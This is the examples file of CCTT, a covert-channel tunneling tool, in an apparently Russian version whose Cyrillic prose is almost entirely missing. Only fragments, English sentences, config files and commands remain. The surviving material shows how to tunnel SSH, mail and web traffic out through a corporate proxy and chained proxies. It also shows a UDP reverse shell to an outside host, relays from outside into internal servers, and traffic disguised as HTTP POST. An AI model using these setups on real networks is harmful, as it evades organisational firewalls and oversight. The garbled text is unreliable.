CCTT - Covert Channel Tunneling Tool v0.1.7 - EXAMPLES
Copyright (C) 2002,2003 Simon Castro - scastro@entreelibre.com
$Id: EXAMPLES_ru,v 1.6 2003/06/13 08:31:15 simsim Exp $

---

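  This file is part of CCTT - (Covert Channel Tunneling Tool) v0.1.7 (C) Simon Castro.
  CCTT is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  CCTT is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
  You should have received a copy of the GNU General Public License along with CCTT; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA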

---

          (   )    CCTT,        /    .

   I)     HTTP       .
  II)     UDP ''. 
 III)  HTTP /     CCTT. 
  IV)   CCTT       .
   V)    CCTT    .
  VI)  HTTP :   /  HTTP .
 VII)  HTTP :  ,     .
VIII)  HTTP :  ,   .

---

I)     HTTP       . 

  A]   

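      The client is on an internal network that reaches the outside through an HTTP proxy; the proxy allows the CONNECT method to TCP port 443.
      The proxy IP address is 192.168.1.1 and its port is 8080.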

  B]   CCTT

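      From the internal host, the user wants to reach :
       * the SSH service on the host that runs the CCTT server (111.222.1.1).
       * the SMTP service on the ISP smtp server (111.222.2.1).
       * the POP service on the ISP pop server (111.222.2.2).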

  C]  

           : 
       * SSH      .
       *   /   ISP smtp  pop .
       *     ( shell),   cctt.
       * Chroot  : jail
       *  ,            CCTT.
       
        (srv_exemple_1.cf)     :
       PROTOCOL=tcp
       IDENT=basic_ident
       IDENT_KEY=simsim
       SRV_SHELL_LOC=/usr/local/bin/false
       SRV_SHELL_CMD=false
       PROXY_MODE_LIST=ssh:127.0.0.1:22
       PROXY_MODE_LIST=smtp:111.222.2.1:25
       PROXY_MODE_LIST=pop:111.222.2.2:110
       PROXY_ONLY=ON
       PERM_USER_GROUP=cctt
       PERM_CHROOT=cage
 
            : 
     
       cl_exemple_1_ssh.cf :
	PROTOCOL=tcp
        CHANNEL_PROXY_IP=192.168.1.1
        CHANNEL_PROXY_PORT=8080
        CHANNEL_PROXY_PROT=tcp
	CHANNEL_PROXY_DEL=30000
        IDENT=basic_ident
        IDENT_KEY=simsim
        PROXY_MODE_LOCAL_IP=127.0.0.1
        PROXY_MODE_LOCAL_PORT=4222
        PROXY_MODE_PROT=tcp
        PROXY_MODE_REMOTE_IP=127.0.0.1
        PROXY_MODE_REMOTE_PORT=22

       cl_exemple_1_smtp.cf :
	PROTOCOL=tcp
        CHANNEL_PROXY_IP=192.168.1.1
        CHANNEL_PROXY_PORT=8080
        CHANNEL_PROXY_PROT=tcp
	CHANNEL_PROXY_DEL=30000
        IDENT=basic_ident
        IDENT_KEY=simsim
        PROXY_MODE_LOCAL_IP=127.0.0.1
        PROXY_MODE_LOCAL_PORT=4225
        PROXY_MODE_PROT=tcp
        PROXY_MODE_REMOTE_IP=111.222.2.1
        PROXY_MODE_REMOTE_PORT=25

       cl_exemple_1_pop.cf :
	PROTOCOL=tcp
        CHANNEL_PROXY_IP=192.168.1.1
        CHANNEL_PROXY_PORT=8080
        CHANNEL_PROXY_PROT=tcp
	CHANNEL_PROXY_DEL=30000
        IDENT=basic_ident
        IDENT_KEY=simsim
        PROXY_MODE_LOCAL_IP=127.0.0.1
        PROXY_MODE_LOCAL_PORT=42110
        PROXY_MODE_PROT=tcp
        PROXY_MODE_REMOTE_IP=111.222.2.2
        PROXY_MODE_REMOTE_PORT=110

  D]      CCTT

        (root ) : 
      cctt -s 111.222.1.1 -p 443 -f srv_exemple_1.cf -t socket_encode -L -v &

        ( ) : 
      cctt -c 111.222.1.1 -d 443 -f cl_exemple_1_ssh.cf -t socket_http_proxy_encode -a &
      cctt -c 111.222.1.1 -d 443 -f cl_exemple_1_smtp.cf -t socket_http_proxy_encode -a &
      cctt -c 111.222.1.1 -d 443 -f cl_exemple_1_pop.cf -t socket_http_proxy_encode -a &

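    The client now has 3 local TCP ports listening, each forwarded through the channel :
      * port 4222 is forwarded to the SSH service.
      * port 4225 is forwarded to the ISP Smtp server.
      * port 42110 is forwarded to the ISP Pop server.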

    CCTT         ,    'cage'      Syslogd.

---

II)     UDP ''.

  A]   

                              ,  UDP  7272.

  B]   CCTT

       UDP       (111.222.1.1:7272)    reverse-shell,             .

  C]  

          :
      *   / UDP    7272.
      *     ( shell),   cctt.
      * Chroot  : jail.
      *  ,           CCTT.

       (srv_exemple_2.cf)     :
      PROTOCOL=udp
      IDENT=basic_ident
      IDENT_KEY=simsim
      SRV_SHELL_LOC=/usr/bin/false
      SRV_SHELL_CMD=false
      PERM_USER_GROUP=cctt
      PERM_CHROOT=cage

       (cl_exemple_2.cf)     :
      PROTOCOL=udp
      IDENT=basic_ident
      IDENT_KEY=simsim

  D]      CCTT

        (root ) : 
      cctt -s 111.222.1.1 -p 7272 -f srv_exemple_2.cf -t socket_encode -l &

        ( ) : 
      cctt -c 111.222.1.1 -d 7272 -f cl_exemple_2.cf -t socket_encode -r &
 
    ,     ,            . Shell    logfile.

---

III)  HTTP /     CCTT.

  A]   .

             I) ,         .           . 
      The IP address of the HTTP proxy is 192.168.1.1 and its port is 8080. The proxy allows the CONNECT method.

  B]   CCTT

       /          .
       ,       SSL,            .

  C]  

          :
      *   /   ISP smtp  pop .
      *     ( shell),   cctt.
      * Chroot  : jail
      *  ,           CCTT.

       (srv_exemple_3.cf)     :
      PROTOCOL=tcp
      IDENT=basic_ident
      IDENT_KEY=simsim
      SRV_SHELL_LOC=/usr/local/bin/false
      SRV_SHELL_CMD=false
      PROXY_MODE_LIST=http:111.222.7.7:80
      PROXY_ONLY=ON
      PERM_USER_GROUP=cctt
      PERM_CHROOT=cage

       (cl_exemple_3.cf)     :
      PROTOCOL=tcp
      CHANNEL_PROXY_IP=192.168.1.1
      CHANNEL_PROXY_PORT=8080
      CHANNEL_PROXY_PROT=tcp
      CHANNEL_PROXY_DEL=30000
      IDENT=basic_ident
      IDENT_KEY=simsim
      PROXY_MODE_LOCAL_IP=127.0.0.1
      PROXY_MODE_LOCAL_PORT=4280
      PROXY_MODE_PROT=tcp
      PROXY_MODE_REMOTE_IP=111.222.7.7
      PROXY_MODE_REMOTE_PORT=80

  D]      CCTT

        (root ) : 
      cctt -s 111.222.1.1 -p 443 -f srv_exemple_3.cf -t socket_encode -L -v &

        ( ) : 
      cctt -c 111.222.1.1 -d 443 -f cl_exemple_3.cf -t socket_http_proxy_encode -a &

           HTTP    127.0.0.1:4280  HTTP      (       IP )    ''  CCTT.

---

IV)   CCTT       .

  A]   

         I),      .
      The IP address and port of the internal HTTP proxy are (192.168.1.1:8080).
      The other HTTP proxies in the chain, which accept HTTP CONNECT, are (111.111.1.1:8080 and 222.222.2.2:8080).
     ,   3      TCP  443  8080.

  B]   CCTT

      SSH        (111.222.1.1:443).
        SSHd,    ,    : '      ' :)

  C]  

       (cl_exemple_4.cf)     :
      PROTOCOL=tcp
      CHANNEL_PROXY_IP=192.168.1.1
      CHANNEL_PROXY_PORT=8080
      CHANNEL_PROXY_PROT=tcp
      CHANNEL_PROXY_DEL=25000
      HTTP_PROXY_CHAIN=111.111.1.1:8080:25000;222.222.2.2:8080:25000
      PROXY_MODE_LOCAL_IP=127.0.0.1
      PROXY_MODE_LOCAL_PORT=4222
      PROXY_MODE_PROT=tcp
      ###    ,      
      IDENT=basic_ident
      IDENT_KEY=simsim
      PROXY_MODE_REMOTE_IP=127.0.0.1
      PROXY_MODE_REMOTE_PORT=22

  D]      CCTT 

        ( ) :
      cctt -c 111.222.1.1 -d 443 -f cl_exemple_4.cf -t client_only_with_http_proxy &

         CCTT,   localhost:4222.
        TCP ,      HTTP ,     ,     SSHd.
      ,    TCP      .

---

V)    CCTT    .

  A]   

             I),        .         .
      The IP address of the HTTP proxy is 192.168.1.1 and its port is 8080. The proxy allows the CONNECT method.

  B]   CCTT

              (192.168.2.1:80)  SMTP  (192.168.2.2:25)   .
          (W1  W2)         (S)   SMTP    CCTT     (C - 111.222.1.1:443)   .

  C]  

       (srv_exemple_5.cf)     :
      PROTOCOL=tcp
      IDENT=basic_ident
      IDENT_KEY=simsim
      SRV_SHELL_LOC=/usr/local/bin/false
      SRV_SHELL_CMD=false
      PROXY_ONLY=ON
      PERM_USER_GROUP=cctt
      PERM_CHROOT=cage

       ,      (cl_Wint_exemple_5.cf),     :
      PROTOCOL=tcp
      IDENT=basic_ident
      IDENT_KEY=simsim
      CHANNEL_PROXY_IP=192.168.1.1
      CHANNEL_PROXY_PORT=8080
      CHANNEL_PROXY_PROT=tcp
      CHANNEL_PROXY_DEL=15000
      PROXY_MODE_PROT=tcp
      PROXY_MODE_REMOTE_IP=192.168.2.1
      PROXY_MODE_REMOTE_PORT=80

       ,    SMTP  (cl_Sint_exemple_5.cf),     :
      PROTOCOL=tcp
      IDENT=basic_ident
      IDENT_KEY=simsim
      CHANNEL_PROXY_IP=192.168.1.1
      CHANNEL_PROXY_PORT=8080
      CHANNEL_PROXY_PROT=tcp
      CHANNEL_PROXY_DEL=15000
      PROXY_MODE_PROT=tcp
      PROXY_MODE_REMOTE_IP=192.168.2.2
      PROXY_MODE_REMOTE_PORT=25

         ,      (cl_Wext_exemple_5.cf),     :
      PROTOCOL=tcp
      IDENT=basic_ident
      IDENT_KEY=simsim
      PROXY_MODE_LOCAL_IP=@IP_W1
      PROXY_MODE_LOCAL_PORT=4280
      PROXY_MODE_PROT=tcp
      PROXY_MODE_REMOTE_IP=192.168.2.1
      PROXY_MODE_REMOTE_PORT=80

         ,    SMTP  (cl_Sext_exemple_5.cf),     :
      PROTOCOL=tcp
      IDENT=basic_ident
      IDENT_KEY=simsim
      PROXY_MODE_LOCAL_IP=@IP_S
      PROXY_MODE_LOCAL_PORT=4225
      PROXY_MODE_PROT=tcp
      PROXY_MODE_REMOTE_IP=192.168.2.2
      PROXY_MODE_REMOTE_PORT=25

  D]      CCTT

        (  root) : 
      cctt -s 111.222.1.1 -p 443 -f srv_exemple_5.cf -t socket -L -v &

         CCTT      :
      cctt -c 111.222.1.1 -d 443 -f cl_Wint_exemple_5.cf -t socket_http_proxy -z &
      cctt -c 111.222.1.1 -d 443 -f cl_Sint_exemple_5.cf -t socket_http_proxy -z &

    =>    CCTT     CCTT  -             SMTP     .

    : CCTT      ,     ,      .

       CCTT        :
       W1,  : cctt -c 111.222.1.1 -d 443 -f cl_Wext_exemple_5.cf -t socket -a &
       S,   : cctt -c 111.222.1.1 -d 443 -f cl_Sext_exemple_5.cf -t socket -a &

    =>        

           :          @IP_W1:4280,    @IP_S:4225     SMTP .
         SMTP  :
      *     @IP_S:4225.
      *  CCTT S    CCTT  C     SMTP .
      * CCTT    ,      CCTT         .
      *  CCTT     ,    SMTP      . 

            SMTP ,        .

---

VI)  HTTP :   /  HTTP .

  The files for this example are in doc/confs/http_post1.
  .      .

  A]   

       ,     HTTP POST          HTTP .

  B]   CCTT

      HTTP CCTT    HTTP POST    ,      .
        CCTT            .
       HTTP     , CCTT     ,     CCTT.

            .

---

VII)  HTTP :  ,     .

  The files for this example are in doc/confs/http_post1.
  .      .

  A]   

       ,     HTTP POST          HTTP .

  B]   CCTT

      CCTT      VI ,          CCTT.
           ( , GET /index.html HTTP/1.0),     ,      ,   .
         HTML   .

---

VIII)  HTTP :  ,   .

  The files for this example are in doc/confs/http_post2.
  .      .

  A]   

       ,     HTTP POST          HTTP .

  B]   CCTT

    CCTT   HTTP              .
           HTTP POST    HTTP  .
    A capture of the HTTP traffic can be found in doc/confs/http_post2/snort_capture.txt.

---